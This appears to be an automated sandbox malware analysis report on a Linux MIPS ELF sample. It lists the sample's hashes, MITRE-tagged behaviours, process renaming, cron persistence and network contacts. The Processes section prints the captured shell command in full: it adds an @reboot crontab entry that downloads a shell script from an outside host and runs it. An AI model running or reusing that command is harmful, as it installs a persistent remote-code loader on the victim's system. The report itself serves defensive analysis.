Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-cf7h3ssbme
Target 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
SHA256 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad

Threat Level: Shows suspicious behavior

The file 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Renames itself

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:02

Reported

2024-10-27 02:04

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.XSZqxU /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/719/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/720/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/1/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/722/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/725/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/mounts /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/718/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/709/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/2/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/723/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/724/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/721/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/721/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Processes

/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:17892 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.XSZqxU

MD5 68130ff0ed9a7764cd371c8e6baa6210
SHA1 d82a9fc5bdb2d9f1cee0bd8458c1f3e94255f3d3
SHA256 3bc09503863de8ab831cfaa97b2f03120397fdaa453c39d3db16f32a0124e462
SHA512 a344d6280beb8e6a2af5740eb256947e5153210f4fb81c28db5d356cf8189e1bb9719e854a8a94b251506393cdcf2ef4e8e039b345dc0d2f951121627e9245aa